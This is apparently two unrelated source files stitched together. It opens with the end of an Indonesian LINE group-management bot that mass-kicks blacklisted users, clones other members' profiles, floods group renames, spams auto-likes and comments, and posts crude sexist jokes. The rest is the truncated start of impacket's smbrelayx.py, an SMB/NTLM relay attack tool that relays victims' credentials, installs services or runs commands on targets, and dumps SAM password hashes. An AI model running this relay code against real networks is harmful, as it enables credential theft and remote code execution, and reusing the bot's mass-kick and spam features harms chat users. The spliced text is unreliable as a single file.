# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list","Targetlist"]:
if msg.from_ in admin:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if msg.from_ in admin:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
if msg.from_ in admin:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#==========================================
#----------------------------------------------
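# "copy @<name>": clones the matched member's profile onto the main bot via CloneContactProfile.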
elif "copy @" in msg.text:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
#-----------------------------------------------
elif msg.text in ["Backup","backup"]:
if msg.from_ in owner:
try:
cl.updateDisplayPicture(backup.pictureStatus)
cl.updateProfile(backup)
cl.sendText(msg.to, "Refreshed.")
except Exception as e:
cl.sendText(msg.to, str(e))
elif "rejectall" in msg.text:
X = cl.getGroupIdsInvited()
for i in X:
cl.rejectGroupInvitation(i)
#--------------------------------------------------------
#-------------Fungsi Balesan Respon Start---------------------#
elif msg.text in ["Ini Apa","ini apa","Apaan Ini","apaan ini"]:
ki.sendText(msg.to,"Ya gitu deh intinya mah questioning")
#-------------Fungsi Balesan Respon Finish---------------------#
elif ("Vkick" in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
#-------------Fungsi Speedbot Start---------------------#
elif msg.text in ["Speed","Sp"]:
if msg.from_ in admin:
start = time.time()
cl.sendText(msg.to, "Sabar Boss...")
elapsed_time = time.time() - start
ki.sendText(msg.to, "%sDetik" % (elapsed_time))
kk.sendText(msg.to, "%sDetik" % (elapsed_time))
cl.sendText(msg.to, "%sDetik" % (elapsed_time))
kc.sendText(msg.to, "%sDetik" % (elapsed_time))
#-------------Fungsi Speedbot Finish---------------------#
#--------------------------------------------------------
elif msg.text in ["Remove all chat"]:
if msg.from_ in admin:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
kk.removeAllMessages(op.param2)
kc.removeAllMessages(op.param2)
cl.sendText(msg.to,"Removed all chat")
#---------------------Sc invite owner ke group------
#-------------Fungsi Banned Send Contact Start------------------#
elif msg.text in ["Ban"]:
if msg.from_ in owner:
wait["wblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
elif msg.text in ["Unban"]:
if msg.from_ in owner:
wait["dblacklist"] = True
cl.sendText(msg.to,"Kirim contact")
ki.sendText(msg.to,"Kirim contact")
kk.sendText(msg.to,"Kirim contact")
kc.sendText(msg.to,"Kirim contact")
#-------------Fungsi Banned Send Contact Finish------------------#
elif msg.text in ["Creator"]:
msg.contentType = 13
msg.contentMetadata = {'mid': 'u31ef22df7f538df1d74dc7f756ef1a32'}
cl.sendText(msg.to,"======================")
cl.sendMessage(msg)
cl.sendText(msg.to,"======================")
cl.sendText(msg.to,"Itu Creator Kami Yang Manis Kalem 😜\nSmule : @FS3i_Kris_S1H\nNama : Kris\nZodiak : Cancer")
#-------------Fungsi Chat ----------------
elif msg.text in ["Woy","woy","Woi","woi"]:
quote = ['Istri yang baik itu Istri yang Mengizinkan Suaminya untuk Poligami 😂😂😂.','Kunci Untuk Bikin Suami Bahagia itu cuma satu..\nIzinkan Suamimu Untuk Selingkuh Coyyy ','Ah Koplak Lu','Muka Lu Kaya Jembut','Ada Orang kah disini?','Ada Janda Yang Bisa Di Ajak Mojok Gak, Euy','Ada Perawan Nganggur ga Coy?']
psn = random.choice(quote)
cl.sendText(msg.to,psn)
#-------------Fungsi Bannlist Start------------------#
elif msg.text in ["Banlist"]:
if msg.from_ in admin:
if wait["blacklist"] == {}:
random.choice(KAC).sendText(msg.to,"Tidak Ada Akun Terbanned")
else:
random.choice(KAC).sendText(msg.to,"Blacklist user")
mc = ""
for mi_d in wait["blacklist"]:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Bannlist Finish------------------#
elif msg.text in ["Cek ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
cocoa = ""
for mm in matched_list:
cocoa += mm + "\n"
random.choice(KAC).sendText(msg.to,cocoa + "")
elif msg.text in ["Kill ban"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
random.choice(KAC).sendText(msg.to,"There was no blacklist user")
return
for jj in matched_list:
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).kickoutFromGroup(msg.to,[jj])
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
random.choice(KAC).sendText(msg.to,"Blacklist emang pantas tuk di usir")
elif msg.text in ["Clear"]:
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
elif "random: " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
strnum = msg.text.replace("random: ","")
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
try:
num = int(strnum)
group = cl.getGroup(msg.to)
for var in range(0,num):
name = "".join([random.choice(source_str) for x in xrange(10)])
time.sleep(0.01)
group.name = name
cl.updateGroup(group)
except:
cl.sendText(msg.to,"Error")
elif "albumat'" in msg.text:
try:
albumtags = msg.text.replace("albumat'","")
gid = albumtags[:6]
name = albumtags.replace(albumtags[:34],"")
cl.createAlbum(gid,name)
cl.sendText(msg.to,name + "created an album")
except:
cl.sendText(msg.to,"Error")
elif "fakecat'" in msg.text:
try:
source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|'
name = "".join([random.choice(source_str) for x in xrange(10)])
anu = msg.text.replace("fakecat'","")
random.choice(KAC).sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu)))
except Exception as e:
try:
cl.sendText(msg.to,str(e))
except:
pass
#===========================================
if op.param3 == "1":
if op.param1 in protectname:
group = cl.getGroup(op.param1)
try:
group.name = wait["pro_name"][op.param1]
cl.updateGroup(group)
cl.sendText(op.param1, "Groupname protect now")
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except Exception as e:
print e
pass
#------------------------------------------------------------------------------------
if op.type == 32:
OWN = ""
if op.param2 in Bots and admin:
pass
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
contact = cl.getContact(op.param2)
ki.kickoutFromGroup(op.param1,[op.param2])
kk.kickoutFromGroup(op.param1,[op.param2])
kc.kickoutFromGroup(op.param1,[op.param2])
ks.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
#===========================================
#---------CCTV-----------
if op.type == 55:
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n[•]" + Name
wait2['ROM'][op.param1][op.param2] = "[•]" + Name
else:
cl.sendText
except:
pass
#---------------------
if op.type == 17:
if op.param2 in Bots:
return
ginfo = cl.getGroup(op.param1)
random.choice(KAC).sendText(op.param1, "Welcome\nSelamat Datang Di " + str(ginfo.name))
random.choice(KAC).sendText(op.param1, "Founder =>>> " + str(ginfo.name) + " :\n" + ginfo.creator.displayName)
random.choice(KAC).sendText(op.param1, "Budayakan Baca Note !!! yah Ka 😊\nSemoga Betah Kk 😘\nNo Baper,No nakal,No Ngeyel ya,No Boong")
print "MEMBER HAS JOIN THE GROUP"
if op.type == 15:
if op.param2 in Bots:
return
random.choice(KAC).sendText(op.param1, "Baper Tuh Orang :v\nBelum di Anu Kayanya 😊")
print "MEMBER HAS LEFT THE GROUP"
#--------------------------------------------------------
#Restart_Program
elif msg.text in ["Bot restart"]:
if msg.from_ in Creator:
cl.sendText(msg.to, "Bot has been restarted")
restart_program()
print "@Restart"
else:
cl.sendText(msg.to, "No Access")
#--------------------------------------------------------
if op.type == 59:
print op
except Exception as error:
print error
def a2():
    # Returns False when the current minute is a multiple of ten, True otherwise.
    now2 = datetime.now()
    nowT = datetime.strftime(now2,"%M")
    if nowT in ["10","20","30","40","50","00"]:
        return False
    else:
        return True
def autolike():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1001)
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"Aku Juga Ikutin Boss Aku Like Status Kamu Ka\n\n Like Back yah Ka 😊")
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Already Liked"
time.sleep(0.01)
#thread3 = threading.Thread(target=autolike)
#thread3.daemon = True
#thread3.start()
#--------------------
def likePost():
for zx in range(0,500):
hasil = cl.activity(limit=500)
if hasil['result']['posts'][zx]['postInfo']['liked'] == False:
if hasil['result']['posts'][zx]['userInfo']['mid'] in owner:
try:
cl.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ki.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kk.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
kc.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
ks.like(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],likeType=1002)
cl.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ki.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kk.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
kc.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
ks.comment(hasil['result']['posts'][zx]['userInfo']['mid'],hasil['result']['posts'][zx]['postInfo']['postId'],"👉ąµţ๏ℓɨЌ€ By✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰😊\n\n☆º°˚˚☆ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰°˚˚☆(^ω^)\nąµţ๏ℓɨЌ€ by Kris ⭐👈 »»» http://line.me/ti/p/GkwfNjoPDH «««")
print "Like"
except:
pass
else:
print "Status Sudah di Like Boss"
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
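# Main polling loop: long-poll the LINE operation feed and hand each operation to bot()
# above; the poll revision is advanced to the highest one seen so operations are not replayed.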
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce SPN checks and/or signing on the server.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
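# Illustrative invocations (a sketch; the host, command and file names below are
# placeholders, only the flags come from the argument parser further down):
#   ./smbrelayx.py -h 10.0.0.5 -c whoami        # relay to a fixed target and run a command
#   ./smbrelayx.py -e payload.exe -one-shot     # relay, execute the given file, attack each target once
#   ./smbrelayx.py -socks                       # keep relayed sessions available through a SOCKS proxy
#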
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
            # Something went wrong; most probably we don't have access as admin. Aborting
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/3/library/codecs.html#standard-encodings\nand then execute smbrelayx.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q',ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request['ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request['LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity']['LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity']['ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity']['UserName'] = authenticateMessage[
'user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity']['Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive']['LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive']['NtChallengeResponse'] = authenticateMessage['ntlm']
